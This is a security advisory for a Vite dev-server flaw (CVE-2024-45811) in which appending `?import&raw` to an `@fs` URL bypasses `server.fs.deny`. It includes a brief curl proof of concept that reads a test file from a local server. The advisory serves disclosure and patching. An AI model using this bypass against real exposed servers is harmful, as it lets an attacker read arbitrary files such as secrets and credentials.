GHSA-9cwx-2883-4wfx
Vite's `server.fs.deny` is bypassed when using `?import&raw`
Details
### Summary The contents of arbitrary files can be returned to the browser.
### Details `@fs` denies access to files outside of Vite serving allow list. Adding `?import&raw` to the URL bypasses this limitation and returns the file content if it exists.
### PoC ```sh $ npm create vite@latest $ cd vite-project/ $ npm install $ npm run dev
$ echo "top secret content" > /tmp/secret.txt
# expected behaviour $ curl "http://localhost:5173/@fs/tmp/secret.txt"
<body> <h1>403 Restricted</h1> <p>The request url "/tmp/secret.txt" is outside of Vite serving allow list.
# security bypassed $ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw" export default "top secret content\n" //# sourceMappingURL=data:application/json;base64,eyJ2... ```
Are you affected?
Enter the version of the package you're using.
Affected packages
References
- https://github.com/vitejs/vite/security/advisories/GHSA-9cwx-2883-4wfx [WEB]
- https://nvd.nist.gov/vuln/detail/CVE-2024-45811 [ADVISORY]
- https://github.com/vitejs/vite/commit/4573a6fd6f1b097fb7296a3e135e0646b996b249 [WEB]
- https://github.com/vitejs/vite/commit/6820bb3b9a54334f3268fc5ee1e967d2e1c0db34 [WEB]
- https://github.com/vitejs/vite/commit/8339d7408668686bae56eaccbfdc7b87612904bd [WEB]
- https://github.com/vitejs/vite/commit/a6da45082b6e73ddfdcdcc06bb5414f976a388d6 [WEB]
- https://github.com/vitejs/vite/commit/b901438f99e667f76662840826eec91c8ab3b3e7 [WEB]
- https://github.com/vitejs/vite [PACKAGE]